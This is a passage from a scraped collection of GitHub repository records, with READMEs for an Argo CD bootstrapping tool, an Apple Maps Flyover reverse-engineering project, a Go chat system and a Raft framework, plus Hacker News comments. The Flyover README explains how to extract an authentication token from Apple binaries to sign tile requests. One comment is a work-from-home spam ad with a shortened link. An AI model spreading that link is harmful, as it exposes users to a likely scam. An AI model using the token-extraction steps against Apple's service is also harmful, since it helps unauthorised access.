\n\n[![Codefresh build status]( https://g.codefresh.io/api/badges/pipeline/codefresh-inc/argocd-autopilot%2Frelease?type=cf-1)]( https://g.codefresh.io/public/accounts/codefresh-inc/pipelines/new/60881f8199c9564ef31aac61) \n[![codecov](https://codecov.io/gh/argoproj-labs/argocd-autopilot/branch/main/graph/badge.svg?token=IDyZNfRUfY)](https://codecov.io/gh/argoproj-labs/argocd-autopilot) \n[![Documentation Status](https://readthedocs.org/projects/argocd-autopilot/badge/?version=latest)](https://argocd-autopilot.readthedocs.io/en/latest/?badge=latest)\n[![slack](https://img.shields.io/badge/slack-argoproj-brightgreen.svg?logo=slack)](https://argoproj.github.io/community/join-slack/)\n\n## Introduction\n\nNew users to GitOps and Argo CD are not often sure how they should structure their repos, add applications, promote apps across environments, and manage the Argo CD installation itself using GitOps. \n\nArgo CD Autopilot saves operators time by:\n\n- Installing and managing the Argo CD application using GitOps.\n- Providing a clear structure for how applications are to be added and updated, all from git.\n- Creating a simple pattern for making updates to applications and promoting those changes across environments.\n- Enabling better disaster recovery by being able to bootstrap new clusters with all the applications previously installed.\n- Handles secrets for Argo CD to prevent them from spilling into plaintext git. (Soon to come)\n\nThe Argo-CD Autopilot is a tool which offers an opinionated way of installing Argo-CD and managing GitOps repositories.\n\n## Installation\n### Using brew:\n```bash\n# install\nbrew install argocd-autopilot\n\n# check the installation\nargocd-autopilot version\n```\n\n### Using scoop:\n```bash\n# update\nscoop update\n\n# install\nscoop install argocd-autopilot\n\n# check the installation\nargocd-autopilot version\n```\n\n### Using chocolatey:\n```bash\n# install\nchoco install argocd-autopilot\n\n# check the installation\nargocd-autopilot version\n```\n\n### Linux AUR:\n```bash\n# install\nyay -S argocd-autopilot-bin\n# or\nsudo pacman -S argocd-autopilot-bin\n\n# check the installation\nargocd-autopilot version\n```\n\n### Linux and WSL (using curl):\n```bash\n# get the latest version or change to a specific version\nVERSION=$(curl --silent \"https://api.github.com/repos/argoproj-labs/argocd-autopilot/releases/latest\" | grep '\"tag_name\"' | sed -E 's/.*\"([^\"]+)\".*/\\1/')\n\n# download and extract the binary\ncurl -L --output - https://github.com/argoproj-labs/argocd-autopilot/releases/download/$VERSION/argocd-autopilot-linux-amd64.tar.gz | tar zx\n\n# move the binary to your $PATH\nmv ./argocd-autopilot-* /usr/local/bin/argocd-autopilot\n\n# check the installation\nargocd-autopilot version\n```\n\n### Mac (using curl):\n```bash\n# get the latest version or change to a specific version\nVERSION=$(curl --silent \"https://api.github.com/repos/argoproj-labs/argocd-autopilot/releases/latest\" | grep '\"tag_name\"' | sed -E 's/.*\"([^\"]+)\".*/\\1/')\n\n# download and extract the binary\ncurl -L --output - https://github.com/argoproj-labs/argocd-autopilot/releases/download/$VERSION/argocd-autopilot-darwin-amd64.tar.gz | tar zx\n\n# move the binary to your $PATH\nmv ./argocd-autopilot-* /usr/local/bin/argocd-autopilot\n\n# check the installation\nargocd-autopilot version\n```\n\n## Docker\nWhen using the Docker image, you have to provide the `.kube` and `.gitconfig` directories as mounts to the running container:\n```\ndocker run \\\n -v 
~/.kube:/home/autopilot/.kube \\\n -v ~/.gitconfig:/home/autopilot/.gitconfig \\\n -it quay.io/argoprojlabs/argocd-autopilot \n```\n\n## Getting Started\n```bash\n# All of the commands need your git token with the --git-token flag,\n# or the GIT_TOKEN env variable:\n\n export GIT_TOKEN=\n\n# The commands will also need your repo clone URL with the --repo flag,\n# or the GIT_REPO env variable:\n\n export GIT_REPO=\n\n# 1. Run the bootstrap installation on your current kubernetes context.\n# This will install argo-cd as well as the application-set controller.\n\n argocd-autopilot repo bootstrap\n\n# Please note that this will automatically attempt to create a private repository,\n# if the clone URL references a non-existing one. If the repository already exists,\n# the command will just clone it.\n\n# 2. Create your first project\n\n argocd-autopilot project create my-project\n\n# 3. Install your first application on your project\n\n argocd-autopilot app create demoapp --app github.com/argoproj-labs/argocd-autopilot/examples/demo-app/ -p my-project\n```\n\nNow, if you go to your Argo-CD UI, you should see something similar to this:\n\n![](./docs/assets/getting_started_apps_1.png)\n\nHead over to our [Getting Started](./docs/Getting-Started.md) guide for further details.\n\n## How it works\nThe autopilot bootstrap command will deploy an Argo-CD manifest to a target k8s cluster, and will commit an Argo-CD Application manifest under a specific directory in your GitOps repository. This Application will manage the Argo-CD installation itself - so after running this command, you will have an Argo-CD deployment that manages itself through GitOps.\n\nFrom that point on, the user can create Projects and Applications that belong to them. Autopilot will commit the required manifests to the repository. Once committed, Argo-CD will do its magic and apply the Applications to the cluster.\n\nAn application can be added to a project from a public git repo + path, or from a directory in the local filesystem.\n\n## Architecture\n![Argo-CD Autopilot Architecture](./docs/assets/architecture.png)\n\nAutopilot communicates with the cluster directly **only** during the bootstrap phase, when it deploys Argo-CD. After that, most commands will only require access to the GitOps repository. 
When adding a Project or Application to a remote k8s cluster, autopilot will require access to the Argo-CD server.\n\nYou can read more about it in the [official proposal doc](https://docs.google.com/document/d/1gxKxaMQzH9nNDWW9mZV5_cS7EO4S-pm1s_u5aMK-PZQ/edit?usp=sharing).\n\n## Features\n* Opinionated way to build a multi-project multi-application system, using GitOps principles.\n* Create a new GitOps repository, or use an existing one.\n* Supports creating the entire directory structure under any path the user requires.\n* When adding applications from a public repo, allow committing as either a kustomization that references the public repo, or as a \"flat\" manifest file containing all the required resources.\n* Use a different cluster from the one Argo-CD is running on, as a default cluster for a Project, or a target cluster for a specific Application.\n\n## Slack Channel\nJoin us in channel #argo-autopilot in CNCF slack workspace.\n\nClick here to join: https://slack.cncf.io/\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "retroplasma/flyover-reverse-engineering", "link": "https://github.com/retroplasma/flyover-reverse-engineering", "tags": ["apple-maps", "apple-flyover", "reverse-engineering", "gis", "3d-models", "extract"], "stars": 545, "description": "Reversing Apple's 3D satellite mode", "lang": "Go", "repo_lang": "", "readme": "\"header\"\n\nReverse-engineering *Flyover* (3D satellite mode) from Apple Maps. Similar work is done for Google Earth [here](https://github.com/retroplasma/earth-reverse-engineering).\n\n#### Status\nRoughly, these parts have been figured out:\n- bootstrap of manifests\n- URL structure\n- authentication algorithm\n- map tiling and conversion from geo coordinates\n- mesh decompression (huffman tables, edgebreaker variant etc.)\n- tile lookup using octree\n\nWe can authenticate URLs and retrieve textured 3D models from given coordinates (latitude, longitude).\n\n#### General\nData is stored in map tiles. These five tile styles are used for Flyover:\n\n|Type | Purpose | URL structure |\n|------|---------------------------------------------|------------------------------------------------------|\n|C3M | Texture, Mesh, Transformation(, Animation) | \ud83c\udd50(?\\|&)style=15&v=\u24ff®ion=\u2776&x=\u2777&y=\u2778&z=\u2779&h=\u277a |\n|C3MM 1| Metadata | \ud83c\udd50(?\\|&)style=14&v=\u24ff&part=\u277b®ion=\u2776 | \n|C3MM 2| Metadata | \ud83c\udd50(?\\|&)style=52&v=\u24ff®ion=\u2776&x=\u2777&y=\u2778&z=\u2779&h=\u277a | \n|DTM 1 | Terrain/Surface/Elevation | \ud83c\udd50(?\\|&)style=16&v=\u24ff®ion=\u2776&x=\u2777&y=\u2778&z=\u2779 |\n|DTM 2 | Terrain/Surface/Elevation | \ud83c\udd50(?\\|&)style=17&v=\u24ff&size=\u277c&scale=\u277d&x=\u2777&y=\u2778&z=\u2779 |\n\n- \ud83c\udd50: URL prefix from resource manifest\n- \u24ff: Version from resource manifest or altitude manifest using region\n- \u2776: Region ID from altitude manifest\n- \u2777\u2778\u2779: Map tile numbers ([tiled web map](https://en.wikipedia.org/wiki/Tiled_web_map) scheme)\n- \u277a: Height/altitude index. Probably from C3MM\n- \u277b: Incremental part number\n- \u277c\u277d: Size/scale. Not sure where its values come from\n\n#### Resource hierarchy\n```\nResourceManifest\n\u2514\u2500 AltitudeManifest\n \u251c\u2500 C3MM\n \u2502 \u2514\u2500 C3M\n \u2514\u2500 DTM?\n```\nFocusing on C3M(M) for now. 
DTMs are images with a footer and are probably used for the [grid](https://user-images.githubusercontent.com/46618410/53483243-fdcbf700-3a78-11e9-8fc0-ad6cfa8c57cd.png) that is displayed when Maps is loading.\n\n#### Code\nThis repository is structured as follows:\n\n|Directory | Description |\n|--------------------|------------------------------|\n|[cmd](./cmd) | command line programs |\n|[pkg](./pkg) | most of the actual code |\n|[proto](./proto) | protobuf files |\n|[scripts](./scripts)| additional scripts |\n|[vendor](./vendor) | dependencies |\n\n##### Setup\n\nInstall [Go](https://golang.org/) 1.15.x and run:\n```bash\ngo get -d github.com/retroplasma/flyover-reverse-engineering/...\ncd \"$(go env GOPATH)/src/github.com/retroplasma/flyover-reverse-engineering\"\n```\n\nThen edit [config.json](config.json):\n- automatically (macOS, Linux, WSL):\n - `./scripts/get_config.sh > config.json`\n- faster (macOS Catalina or older):\n - `./scripts/get_config_macos.sh > config.json`\n- or manually (Catalina or older):\n - `resourceManifestURL`: from [GEOConfigStore.db/com.apple.GEO.plist](#files-on-macos) or [GeoServices](#files-on-macos) binary\n - `tokenP1`: from [GeoServices](#files-on-macos) binary (function: `GEOURLAuthenticationGenerateURL`)\n\n##### Command line programs\nHere are some command line programs that use code from [pkg](./pkg):\n\n###### Export OBJ [[code]](./cmd/export-obj/main.go)\n\nUsage:\n```\ngo run cmd/export-obj/main.go [lat] [lon] [zoom] [tryXY] [tryH]\n\nParameter Description Example\n--------------------------------------\nlat Latitude 34.007603\nlon Longitude -118.499741\nzoom Zoom (~ 13-20) 20\ntryXY Area scan 3\ntryH Altitude scan 40\n```\n\nThis exports Santa Monica Pier to `./downloaded_files/obj/...`:\n```\ngo run cmd/export-obj/main.go 34.007603 -118.499741 20 3 40\n```\n\nOptional: Center-scale OBJ using node.js script:\n```\nnode scripts/center_scale_obj.js\n```\n\nIn Blender (compatible tutorial [here](https://github.com/retroplasma/earth-reverse-engineering/blob/1dd24a723513d7e96f249e2c635416d4596992c4/BLENDER.md)):\n\n\n\n\n###### Authenticate URL [[code]](./cmd/auth/main.go)\nThis authenticates a URL using parameters from `config.json`:\n```\ngo run cmd/auth/main.go [url]\n```\n\n###### Parse C3M file [[code]](./cmd/parse-c3m/main.go)\nThis parses a C3M v3 file, decompresses meshes, reads JPEG textures and produces a struct that contains a textured 3d model:\n```\ngo run cmd/parse-c3m/main.go [file]\n```\n\n###### Parse C3MM file [[code]](./cmd/parse-c3mm/main.go)\nThis parses a C3MM v1 file. 
The C3MM files in a region span octrees whose roots are indexed in the first file.\n```\ngo run cmd/parse-c3mm/main.go [file] [[file_number]]\n```\n\n#### Files on macOS\n- `~/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/GEOConfigStore.db`\n - last resource manifest url\n- `~/Library/Preferences/com.apple.GEO.plist`\n - last resource manifest url ~prior to catalina\n- `~/Library/Caches/GeoServices/Resources/altitude-*.xml`\n - defines regions for c3m urls\n - `altitude-*.xml` url in resource manifest\n- `~/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/MapTiles/MapTiles.sqlitedb`\n - local map tile cache\n- `/System/Library/PrivateFrameworks/GeoServices.framework/GeoServices`\n - resource manifest base url, networking, caching, authentication\n- `/System/Library/PrivateFrameworks/VectorKit.framework/VectorKit`\n - parsers, decoders\n- `/System/Library/PrivateFrameworks/GeoServices.framework/XPCServices/com.apple.geod.xpc`\n - loads `GeoServices`\n- `/Applications/Maps.app/Contents/MacOS/Maps`\n - loads `VectorKit`\n\n#### Important\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n", "readme_type": "markdown", "hn_comments": "I am making 8 to 10 dollar par hour at home on laptop ,, This is make happy But now i am Working 5 hour Dailly and make 40 dollar Easily .. This is enough for me to happy my family..how ?? i am making this so u can do it Easily....Click this link http://xurl.es/simplejobsthis is the same person who RE'd Google Earth a couple months ago: https://news.ycombinator.com/item?id=18900080I\u2019d be interested in hearing how they reverse engineered the data!As someone who works with GIS data and map meshes this is really awesome. Hats off to the author.Coincidence: Half an hour after reading this thread, a white Subaru with California tags stopped at the red light outside my office window. Big disco ball on a platform attached to the roof and \"Apple Maps maps.apple.com\" stenciled on the window.I took a picture.https://imgur.com/UwK2wYyI don't think this is satellite data, most likely photos captured from planes.And I'd kinda be curious to what Microsoft has been working on, I remember their birds eye was pretty good a few years ago.Apple I'd believe the are selectively trying to improve their data in areas that are heavily visited by their users.Also, I did for the first time see an Apple branded car with a photo sphere on the roof recently and kinda got excited that they are gonna try and bring competition into maps / street view that Google has dominated for the last decade.that's really greatI just like how the example is the end of the Santa Monica pier!This is awesome. What are people using it for?I recently asked the founder of a pretty big GIS company how they handle plagiarism. The answer: \"we don't bother. [we just monetize services on top of open data.]\"So it looks like the intentional errors method didn't work out in the end. 
[1]Wonder if Apple will be as accommodating though :phttps://www.gislounge.com/map-traps-intentional-mapping-erro...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Terry-Ye/im", "link": "https://github.com/Terry-Ye/im", "tags": ["goim", "im"], "stars": 546, "description": " \u7eafgo\u5b9e\u73b0\u7684\u5206\u5e03\u5f0fim\u5373\u65f6\u901a\u8baf\u7cfb\u7edf\uff0c\u5404\u5c42\u53ef\u5355\u72ec\u90e8\u7f72\uff0c\u4e4b\u95f4\u901a\u8fc7rpc\u901a\u8baf", "lang": "Go", "repo_lang": "", "readme": "### \u7b80\u4ecb\n\u7eafgo\u5b9e\u73b0\u7684im\u5373\u65f6\u901a\u8baf\u7cfb\u7edf\uff0c\u5404\u5c42\u53ef\u5355\u72ec\u90e8\u7f72\uff0c\u4e4b\u95f4\u901a\u8fc7rpc\u901a\u8baf\uff0c\u652f\u6301\u96c6\u7fa4\uff0c\u5b66\u4e60\u4e8egoim, \u53e6\u4f7f\u7528\u4e8ezookeeper,\u6269\u5c55\u6027\u4f1a\u5927\u5927\u589e\u5f3a, \u603b\u5206\u4e09\u5c42\n1. comet\uff08\u7528\u6237\u8fde\u63a5\u5c42\uff09\uff0c\u53ef\u4ee5\u76f4\u63a5\u90e8\u7f72\u591a\u4e2a\u8282\u70b9\uff0c\u6bcf\u4e2a\u8282\u70b9\u4fdd\u8bc1serverId \u552f\u4e00\uff0c\u5728\u914d\u7f6e\u6587\u4ef6comet.toml\n2. logic\uff08\u4e1a\u52a1\u903b\u8f91\u5c42\uff09\uff0c\u65e0\u72b6\u6001\uff0c\u5404\u5c42\u901a\u8fc7rpc\u901a\u8baf\uff0c\u5bb9\u6613\u6269\u5c55\uff0c\u652f\u6301http\u63a5\u53e3\u6765\u63a5\u6536\u6d88\u606f\n3. job\uff08\u4efb\u52a1\u63a8\u9001\u5c42\uff09\u901a\u8fc7redis \u8ba2\u9605\u53d1\u5e03\u529f\u80fd\u8fdb\u884c\u63a8\u9001\u5230comet\u5c42\u3002\n\n### \u67b6\u6784\u56fe\n![image](https://note.youdao.com/yws/public/resource/ac2abf3027ec5c46d62bb5d690d2ed18/xmlnote/WEBRESOURCEabe5f0a5c9699a8c878afac92f4dc6bb/3749)\n\n### \u65f6\u5e8f\u56fe\n\u4ee5\u4e0bComet \u5c42\uff0cLogic \u5c42\uff0cJob\u5c42\u90fd\u53ef\u4ee5\u7075\u6d3b\u6269\u5c55\u673a\u5668\n![image](https://note.youdao.com/yws/public/resource/ac2abf3027ec5c46d62bb5d690d2ed18/xmlnote/WEBRESOURCE2b38217eac4718c99b817005e864fe5d/2921)\n\n### \u7279\u6027\n1. \u5206\u5e03\u5f0f\uff0c\u53ef\u62d3\u6251\u7684\u67b6\u6784\n2. \u652f\u6301\u5355\u4e2a\uff0c\u623f\u95f4\u63a8\u9001\n3. \u5fc3\u8df3\u652f\u6301\uff08gorilla/websocket\u5185\u7f6e\uff09\n4. \u57fa\u4e8eredis \u505a\u6d88\u606f\u63a8\u9001\n5. \u8f7b\u91cf\u7ea7\n6. \u6301\u7eed\u8fed\u4ee3...\n\n### \u90e8\u7f72\n1. \u5b89\u88c5\n```\ngo get -u github.com/Terry-Ye/im\nmv $GOPATH/src/github.com/Terry-Ye/im $GOPATH/src/im\ncd $GOPATH/src/im\ngo get ./...\n# \u9700\u8981\u4f7f\u7528zookeeper\u670d\u52a1 \u6587\u6863\u6700\u5e95\u6709\u5b89\u88c5\u542f\u52a8\u65b9\u6cd5\ngo get -u -v -tags \"zookeeper\" github.com/smallnest/rpcx/...\n\n\n\n```\n\ngolang.org \u5305\u62c9\u4e0d\u4e0b\u6765\u7684\u60c5\u51b5\uff0c\u4f8b\n```\npackage golang.org/x/net/ipv4: unrecognized import path \"golang.org/x/net/ipv4\" (https fetch: Get https://golang.org/x/net/ipv4?go-get=1: dial tcp 216.239.37.1:443: i/o timeout)\n```\n\n\u4ecegithub \u62c9\u4e0b\u6765\uff0c\u518d\u79fb\u52a8\u4f4d\u7f6e\n```\n\ngit clone https://github.com/golang/net.git\nmkdir -p golang.org/x/\n\nmv net $GOPATH/src/golang.org/x/\n```\n\n2. 
\u90e8\u7f72im\n\u5b89\u88c5comet\u3001logic\u3001job\u6a21\u5757\n```\n# \u6ce8\u610f\uff1a\u7b2c\u4e00\u6b21\u9700\u8981\u5148\u542f\u52a8logic \uff0c\u56e0\u4e3a\u8981\u6ce8\u518c \u670d\u52a1\u7aef\u7684zookeeper, \u4e0d\u7136\u5148\u542f\u52a8comet\u4f1a\u62a5\u9519\uff0c\u7b2c\u4e8c\u6b21\u5219\u4e0d\u9700\u8981\ncd ../logic/\nmv logic.toml.example logic.toml\ngo install -tags zookeeper # \u6216 go run -tags zookeeper *.go\n$GOPATH/bin/logic d $GOPATH/src/im/logic/\n# nohup $GOPATH/bin/logic d $GOPATH/src/im/logic/ 2>&1 > /data/log/im/logic.log &\n\ncd $GOPATH/src/im/comet\nmv comet.toml.example comet.toml\ngo install -tags zookeeper # \u6216 go run -tags zookeeper *.go\n# \u542f\u52a8\n$GOPATH/bin/comet d $GOPATH/src/im/comet/\n# nohup $GOPATH/bin/comet d $GOPATH/src/im/comet/ 2>&1 > /data/log/im/comet.log &\n\n\ncd ../job\nmv job.toml.example job.toml\ngo install # \u6216 go run *.go\n$GOPATH/bin/job d $GOPATH/src/im/job/\n# nohup $GOPATH/bin/job d $GOPATH/src/im/job/ 2>&1 > /data/log/im/job.log &\n\n\n\n// demo\u9875\u9762\u6267\u884c\ncd $GOPATH/src/im/demo\ngo run main.go\n\n```\n\n3. [im_api](https://github.com/Terry-Ye/im_api) \u662fim\u7cfb\u7edf\u4e2d\u4f7f\u7528\u7684\u63a5\u53e3\uff0c\u9700\u8981\u50cfdemo\u90a3\u6837\u6574\u4f53\u8dd1\u8d77\u6765\u9700\u8981\u5b8c\u6574\u7684\u90e8\u7f72\n\n### \u90e8\u7f72\u6ce8\u610f\u4e8b\u9879\n1. \u90e8\u7f72\u670d\u52a1\u5668\u6ce8\u610f\u9632\u706b\u5899\u662f\u5426\u5f00\u653e\u5bf9\u5e94\u7684\u7aef\u53e3(\u672c\u5730\u4e0d\u9700\u8981\uff0c\u5177\u4f53\u9700\u8981\u7684\u7aef\u53e3\u5728\u5404\u5c42\u7684\u914d\u7f6e\u6587\u4ef6)\n\n### demo\n\u804a\u5929\u5ba4\uff1ahttps://www.texixi.com:1999/\n\n\n### \u4f7f\u7528\u7684\u5305\n* log: github.com/sirupsen/logrus\n* rpc: github.com/smallnest/rpcx\n* websocket: github.com/gorilla/websocket\n* \u914d\u7f6e\u6587\u4ef6\uff1agithub.com/spf13/viper\n\n\n### zookeeper \u5b89\u88c5\n```\n wget http://mirrors.hust.edu.cn/apache/zookeeper/stable/zookeeper-3.4.12.tar.gz\n tar -zxvf zookeeper-3.4.12.tar.gz\n cd zookeeper-3.4.12/conf/\n mv zoo_sample.cfg zoo.cfg //\u66f4\u6539\u9ed8\u8ba4\u914d\u7f6e\u6587\u4ef6\u540d\u79f0\n vi zoo.cfg //\u7f16\u8f91\u914d\u7f6e\u6587\u4ef6\uff0c\u81ea\u5b9a\u4e49dataDir\n cd ../bin\n ./zkServer.sh start //\u542f\u52a8\n```\n\n### \u540e\u7eed\u8ba1\u5212\n1. \u76d1\u63a7\n2. \u804a\u5929\u673a\u5668\u4eba\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tidwall/finn", "link": "https://github.com/tidwall/finn", "tags": ["raft", "redis", "golang", "distributed-computing"], "stars": 545, "description": "Fast Raft framework using the Redis protocol for Go", "lang": "Go", "repo_lang": "", "readme": "**This project has been archived. Please check out [Uhaha](https://github.com/tidwall/uhaha) for a fitter, happier, more productive Raft framework.**\n\n
FINN logo and badges
\n\nFinn is a fast and simple framework for building [Raft](https://raft.github.io/) implementations in Go. It uses [Redcon](https://github.com/tidwall/redcon) for the network transport and [Hashicorp Raft](https://github.com/hashicorp/raft). There is also the option to use [LevelDB](https://github.com/syndtr/goleveldb), [BoltDB](https://github.com/boltdb/bolt) or [FastLog](https://github.com/tidwall/raft-fastlog) for log persistence.\n\n\nFeatures\n--------\n\n- Simple API for quickly creating a [fault-tolerant](https://en.wikipedia.org/wiki/Fault_tolerance) cluster\n- Fast network protocol using the [raft-redcon](https://github.com/tidwall/raft-redcon) transport\n- Optional [backends](#log-backends) for log persistence. [LevelDB](https://github.com/syndtr/goleveldb), [BoltDB](https://github.com/boltdb/bolt), or [FastLog](https://github.com/tidwall/raft-fastlog)\n- Adjustable [consistency and durability](#consistency-and-durability) levels\n- A [full-featured example](#full-featured-example) to help jumpstart integration\n- [Built-in raft commands](#built-in-raft-commands) for monitoring and managing the cluster\n- Supports the [Redis log format](http://build47.com/redis-log-format-levels/)\n- Works with clients such as [redigo](https://github.com/garyburd/redigo), [redis-py](https://github.com/andymccurdy/redis-py), [node_redis](https://github.com/NodeRedis/node_redis), [jedis](https://github.com/xetorthio/jedis), and [redis-cli](http://redis.io/topics/rediscli)\n\n\nGetting Started\n---------------\n\n### Installing\n\nTo start using Finn, install Go and run `go get`:\n\n```sh\n$ go get -u github.com/tidwall/finn\n```\n\nThis will retrieve the library.\n\n### Example\n\nHere's an example of a Redis clone that accepts the GET, SET, DEL, and KEYS commands.\n\nYou can run a [full-featured version](#full-featured-example) of this example from a terminal:\n\n```\ngo run example/clone.go\n```\n\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"io\"\n\t\"io/ioutil\"\n\t\"log\"\n\t\"sort\"\n\t\"strings\"\n\t\"sync\"\n\n\t\"github.com/tidwall/finn\"\n\t\"github.com/tidwall/match\"\n\t\"github.com/tidwall/redcon\"\n)\n\nfunc main() {\n\tn, err := finn.Open(\"data\", \":7481\", \"\", NewClone(), nil)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer n.Close()\n\tselect {}\n}\n\ntype Clone struct {\n\tmu sync.RWMutex\n\tkeys map[string][]byte\n}\n\nfunc NewClone() *Clone {\n\treturn &Clone{keys: make(map[string][]byte)}\n}\n\nfunc (kvm *Clone) Command(m finn.Applier, conn redcon.Conn, cmd redcon.Command) (interface{}, error) {\n\tswitch strings.ToLower(string(cmd.Args[0])) {\n\tdefault:\n\t\treturn nil, finn.ErrUnknownCommand\n\tcase \"set\":\n\t\tif len(cmd.Args) != 3 {\n\t\t\treturn nil, finn.ErrWrongNumberOfArguments\n\t\t}\n\t\treturn m.Apply(conn, cmd,\n\t\t\tfunc() (interface{}, error) {\n\t\t\t\tkvm.mu.Lock()\n\t\t\t\tkvm.keys[string(cmd.Args[1])] = cmd.Args[2]\n\t\t\t\tkvm.mu.Unlock()\n\t\t\t\treturn nil, nil\n\t\t\t},\n\t\t\tfunc(v interface{}) (interface{}, error) {\n\t\t\t\tconn.WriteString(\"OK\")\n\t\t\t\treturn nil, nil\n\t\t\t},\n\t\t)\n\tcase \"get\":\n\t\tif len(cmd.Args) != 2 {\n\t\t\treturn nil, finn.ErrWrongNumberOfArguments\n\t\t}\n\t\treturn m.Apply(conn, cmd, nil,\n\t\t\tfunc(interface{}) (interface{}, error) {\n\t\t\t\tkvm.mu.RLock()\n\t\t\t\tval, ok := kvm.keys[string(cmd.Args[1])]\n\t\t\t\tkvm.mu.RUnlock()\n\t\t\t\tif !ok {\n\t\t\t\t\tconn.WriteNull()\n\t\t\t\t} else {\n\t\t\t\t\tconn.WriteBulk(val)\n\t\t\t\t}\n\t\t\t\treturn nil, nil\n\t\t\t},\n\t\t)\n\tcase 
\"del\":\n\t\tif len(cmd.Args) < 2 {\n\t\t\treturn nil, finn.ErrWrongNumberOfArguments\n\t\t}\n\t\treturn m.Apply(conn, cmd,\n\t\t\tfunc() (interface{}, error) {\n\t\t\t\tvar n int\n\t\t\t\tkvm.mu.Lock()\n\t\t\t\tfor i := 1; i < len(cmd.Args); i++ {\n\t\t\t\t\tkey := string(cmd.Args[i])\n\t\t\t\t\tif _, ok := kvm.keys[key]; ok {\n\t\t\t\t\t\tdelete(kvm.keys, key)\n\t\t\t\t\t\tn++\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tkvm.mu.Unlock()\n\t\t\t\treturn n, nil\n\t\t\t},\n\t\t\tfunc(v interface{}) (interface{}, error) {\n\t\t\t\tn := v.(int)\n\t\t\t\tconn.WriteInt(n)\n\t\t\t\treturn nil, nil\n\t\t\t},\n\t\t)\n\tcase \"keys\":\n\t\tif len(cmd.Args) != 2 {\n\t\t\treturn nil, finn.ErrWrongNumberOfArguments\n\t\t}\n\t\tpattern := string(cmd.Args[1])\n\t\treturn m.Apply(conn, cmd, nil,\n\t\t\tfunc(v interface{}) (interface{}, error) {\n\t\t\t\tvar keys []string\n\t\t\t\tkvm.mu.RLock()\n\t\t\t\tfor key := range kvm.keys {\n\t\t\t\t\tif match.Match(key, pattern) {\n\t\t\t\t\t\tkeys = append(keys, key)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tkvm.mu.RUnlock()\n\t\t\t\tsort.Strings(keys)\n\t\t\t\tconn.WriteArray(len(keys))\n\t\t\t\tfor _, key := range keys {\n\t\t\t\t\tconn.WriteBulkString(key)\n\t\t\t\t}\n\t\t\t\treturn nil, nil\n\t\t\t},\n\t\t)\n\t}\n}\n\nfunc (kvm *Clone) Restore(rd io.Reader) error {\n\tkvm.mu.Lock()\n\tdefer kvm.mu.Unlock()\n\tdata, err := ioutil.ReadAll(rd)\n\tif err != nil {\n\t\treturn err\n\t}\n\tvar keys map[string][]byte\n\tif err := json.Unmarshal(data, &keys); err != nil {\n\t\treturn err\n\t}\n\tkvm.keys = keys\n\treturn nil\n}\n\nfunc (kvm *Clone) Snapshot(wr io.Writer) error {\n\tkvm.mu.RLock()\n\tdefer kvm.mu.RUnlock()\n\tdata, err := json.Marshal(kvm.keys)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif _, err := wr.Write(data); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}\n```\n\nThe Applier Type\n----------------\nEvery `Command()` call provides an `Applier` type which is responsible for handling all Read or Write operation. In the above example you will see one `m.Apply(conn, cmd, ...)` for each command.\n\nThe signature for the `Apply()` function is:\n```go\nfunc Apply(\n\tconn redcon.Conn, \n\tcmd redcon.Command,\n\tmutate func() (interface{}, error),\n\trespond func(interface{}) (interface{}, error),\n) (interface{}, error)\n```\n\n- `conn` is the client connection making the call. It's possible that this value may be `nil` for commands that are being replicated on Follower nodes. \n- `cmd` is the command to process.\n- `mutate` is the function that handles modifying the node's data. \nPassing `nil` indicates that the operation is read-only.\nThe `interface{}` return value will be passed to the `respond` func.\nReturning an error will cancel the operation and the error will be returned to the client.\n- `respond` is used for responding to the client connection. It's also used for read-only operations. The `interface{}` param is what was passed from the `mutate` function and may be `nil`. \nReturning an error will cancel the operation and the error will be returned to the client.\n\n*Please note that the `Apply()` command is required for modifying or accessing data that is shared on all of the nodes.\nOptionally you can forgo the call altogether for operations that are unique to the node.*\n\nSnapshots\n---------\nAll Raft commands are stored in one big log file that will continue to grow. The log is stored on disk, in memory, or both. 
At some point the server will run out of memory or disk space.\nSnapshots allows for truncating the log so that it does not take up all of the server's resources.\n\nThe two functions `Snapshot` and `Restore` are used to create a snapshot and restore a snapshot, respectively.\n\nThe `Snapshot()` function passes a writer that you can write your snapshot to.\nReturn `nil` to indicate that you are done writing. Returning an error will cancel the snapshot. If you want to disable snapshots altogether:\n\n```go\nfunc (kvm *Clone) Snapshot(wr io.Writer) error {\n\treturn finn.ErrDisabled\n}\n```\n\nThe `Restore()` function passes a reader that you can use to restore your snapshot from.\n\n*Please note that the Raft cluster is active during a snapshot operation. \nIn the example above we use a read-lock that will force the cluster to delay all writes until the snapshot is complete.\nThis may not be ideal for your scenario.*\n\nFull-featured Example\n---------------------\n\nThere's a command line Redis clone that supports all of Finn's features. Print the help options:\n\n```\ngo run example/clone.go -h\n```\n\nFirst start a single-member cluster:\n```\ngo run example/clone.go\n```\n\nThis will start the clone listening on port 7481 for client and server-to-server communication.\n\nNext, let's set a single key, and then retrieve it:\n\n```\n$ redis-cli -p 7481 SET mykey \"my value\"\nOK\n$ redis-cli -p 7481 GET mykey\n\"my value\"\n```\n\nAdding members:\n```\ngo run example/clone.go -p 7482 -dir data2 -join :7481\ngo run example/clone.go -p 7483 -dir data3 -join :7481\n```\n\nThat's it. Now if node1 goes down, node2 and node3 will continue to 